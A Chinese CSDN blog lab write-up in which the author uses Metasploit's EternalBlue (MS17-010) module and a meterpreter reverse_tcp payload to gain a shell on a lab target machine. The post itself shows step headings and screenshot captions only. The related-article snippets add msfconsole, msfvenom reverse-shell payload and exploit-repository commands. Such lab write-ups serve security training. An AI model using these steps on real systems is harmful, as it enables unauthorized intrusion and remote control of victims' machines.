网安实训(九)| 利用Metasploit工具和Ms17-010漏洞进行控制权限获取

已于 2022-08-19 20:22:35 修改
阅读量3.5k 收藏 11
点赞数 3
分类专栏: 网络安全实训 实验 计算机网络 文章标签: 系统安全 安全 网络安全 安全漏洞
于 2022-02-19 10:41:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/as12138/article/details/123015287
版权

目录

 

一、实验目的

二、实验过程

步骤一:使用msfconsole进入metasploit

步骤二:查找Ms17-010 对应模块

步骤三:调用“永恒之蓝”攻击模块

步骤四:查看需要设置的exploit

步骤五:查看靶机IP

步骤六:输入目标靶机IP

步骤七:配置payloads

步骤八:选取对应的某攻击载荷(此处选择Windows/x64/meterpreter/reverse_tcp)

步骤九:配置攻击机和靶机IP

步骤十:开始攻击

三、实验效果

获取到靶机shell

一、实验目的

        Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

        MS17-010是微软的一个系统漏洞,通过该漏洞,攻击者可获取到靶机的最高shell权限,从而进行一系列的操作。

        本实验将利用Metasploit进行MS17-010漏洞的复现和攻击。

二、实验过程

步骤一:使用msfconsole进入metasploit

图 1 进入metasploit

步骤二:查找Ms17-010 对应模块

 图 2 查找Ms17-010对应模块

步骤三:调用“永恒之蓝”攻击模块

图 3 调用“永恒之蓝”攻击模块

步骤四:查看需要设置的exploit

图 4 查看需要设置的exploit

步骤五:查看靶机IP

 图 5 查看靶机IP

步骤六:输入目标靶机IP

图 6 输入目标靶机IP

步骤七:配置payloads

图 7 配置payloads

步骤八:选取对应的某攻击载荷(此处选择Windows/x64/meterpreter/reverse_tcp)

图 8 选择攻击载荷

步骤九:配置攻击机和靶机IP

图 9 配置IP

步骤十:开始攻击

图 10 开始攻击

三、实验效果

获取到靶机shell

 图 11 获取到靶机Shell

注:这里的IP地址已经是靶机IP,表示已经进入靶机控制台

朔方鸟
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
Metasploit 操作及内网 Pivot图文教程
xiongIT的博客
12-04 441
Metasploit 是一款开源的安全漏洞检测工具,集成了丰富的渗透测试工具,深受安全工作者喜爱。
AutoBlue-MS17-010:这是半自动的,完全正常工作,no-bs,非metasploit版本的MS17-010公共漏洞利用代码
02-06
MS17-010利用代码这是一些no-bs公共漏洞利用代码,可以为永恒的蓝色漏洞利用生成有效的shellcode,并使用metasploit多处理程序编写事件侦听器的脚本。 此版本的漏洞利用程序以无需使用metasploit即可利用永恒蓝色的...
Metasploit--MS17_010(永恒之蓝)
千寻的博客
02-18 502
文章目录MS17_010漏洞利用Auxiliary辅助探测模块介绍命令Exploit漏洞利用模块Payload攻击载荷模块介绍命令摘抄 MS17_010漏洞利用 msfconsole #进入metasploit框架 search ms17_010#寻找MS17_010漏洞 这里找到了两个模块: 第一个辅助模块是探测主机是否存在MS17_010漏洞, 第二个是漏洞利用模块,我们先探测哪些主机存在漏洞 Auxiliary辅助探测模块 介绍 该模块不会直接在攻击机和靶机之间建立访问 只负责执行扫描,嗅
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)
最新发布
2401_84297796的博客
05-03 797
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
Metasploitable渗透测试实战:ms17-010
weixin_68951704的博客
05-05 2912
漏洞简介: 永恒之蓝(即ms17-010)是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 Windows操作系统的SMBv1协议中存在安全漏洞。攻击者会扫描开放445文件
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
Zichel77的博客
10-06 2492
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用。这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本。Windows下IP地址为192.168.92.136。就可以看到windows7电脑中新建了这么个文件。看到WIN才说明利用成功,FAIL就是失败。使用的是nmap模块,输入命令进行扫描。开启了两台虚拟机,保证在同一网段下。两台虚拟机在同一网段,故可保持通信。我没这个病毒就不传了哈哈哈哈哈。
Metasploit实验
mingyqf的博客
12-05 2425
实验二 Metasploit 1、实验目的 通过本实验可以: 1)掌握Metasploit的基本概念 2)掌握Metasploit对各个平台的木马下放 3)掌握经典漏洞MS17-010 2、实验环境 本实验需准备: Kali虚拟机 2)Windows虚拟机 3)Centos/Ubuntu虚拟机 3、实验需求 1)将渗透主机KALI,Windows与Metasploitable2的网卡连接模式设置为NAT模式 Kali: Windows7: metasploitable2: 2)使用metaspoit
网络安全-实验三ms17-010漏洞利用.docx
11-10
网络安全-实验三MS17-010漏洞利用】 实验背景: MS17-010漏洞,也称为“永恒之蓝”(EternalBlue),是针对Microsoft Windows操作系统的一个严重漏洞,主要影响Windows XP、Windows 7以及Server 2003和2008等未打...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
Windows漏洞 MS17-010 / EternalBlue(永恒之蓝)工具-易语言
06-11
MS17-010 / EternalBlue(永恒之蓝) 漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
MS17-010:MS17-010 Poc Shell 调用Nmap and Metasploit 内网445测试的一款Poc
05-18
永恒之蓝 MS17-010 Scan and Exploit Shell Usage MAC OSX git clone https://github.com/xaiJoker/MS17-010/ cd ms17-010 && chmod +x ms17-010.sh sh ms17-010.sh Linux git clone ...
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
07-27
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
使用metasploit(MSF)对windows的ms17-010漏洞进行利用
此博客内容主要是小可日常工作中的一些问题解决的记录整理而成
08-14 1236
Ping扫描-禁用端口扫描负责检查目标机是否有常见漏洞,如MS08-067。
Kali Linux渗透测试--利用漏洞ms17-010对windows Server 2008 r2渗透
无崖子的博客
08-24 4231
实验环境在本地搭建 攻击机:Kali Linux 2019 ip:192.168.5.11 靶机:Windows 7或Windows Server 2008 r2 ip 192.168.5.22 1.查看靶机445端口是否开启,利用zenmap扫描端口,发现445端口开启 ...
Metasploit之Hash值传递渗透
a1b2c3是弱口令
12-06 3096
讲述Metasploit知道内网机器密码或者是不知道密码能够拿到shell获取到hash值的两种渗透测试。 测试环境 目标机: Windows 7 Ultimate 192.168.1.9 攻击机: Linux 4.6.0-kali1-amd64 192.168.1.31 I HAVE PASS 攻击机姿势: msfconsole use exploit/windows/smb/psex...
网络安全MS17-010“永恒之蓝”漏洞利用
热门推荐
qq_45748133的博客
01-06 1万+
导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝”漏洞的简单利用。 一、实验原理 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 二、实验环境 三、实验记录 一次渗透的基本步骤 (1)启动kali虚机,进入root权限打开Metasploit渗透工具。 msfco
Metasploit渗透测试(获取靶机控制权)
qq_51926773的博客
11-07 514
一,打开kali生成一个被控端: 输入命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /root/payload.exe 这是你会发现你的kali会多出一个文件: 二,然后在kali输入msfconsole: 然后输入set payload windows/meterpreter/reverse_tcp,回车zai 再输入set lhost 靶机ip ...
Metasploit-MS17-010利用
weixin_33857679的博客
01-23 290
**本故事纯属虚构,如有雷同纯属巧合 **1. nmap扫一梭nmap-T4-F--scriptms-sql-info192.168.1.8 StartingNmap7.60(https://nmap.org)at2018-01-1916:24?D1ú±ê×?ê±?? Nmapscanreportfor192.168.1.8 Hostis...
网络安全】通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
qq_68643282的博客
03-12 2277
通过kali工具msfconsole利用ms17-010漏洞获取靶机shell以及远程登录
如何使用metasploit利用ms17-010漏洞对模拟靶机进行攻击
06-09
MS17-010漏洞是指Windows SMB远程代码执行漏洞,可以通过Metasploit利用这个漏洞对目标系统进行攻击。下面是攻击步骤: 1. 打开Metasploit控制台,输入`msfconsole`命令启动。 2. 搜索MS17-010漏洞模块,输入命令`...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

朔方鸟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值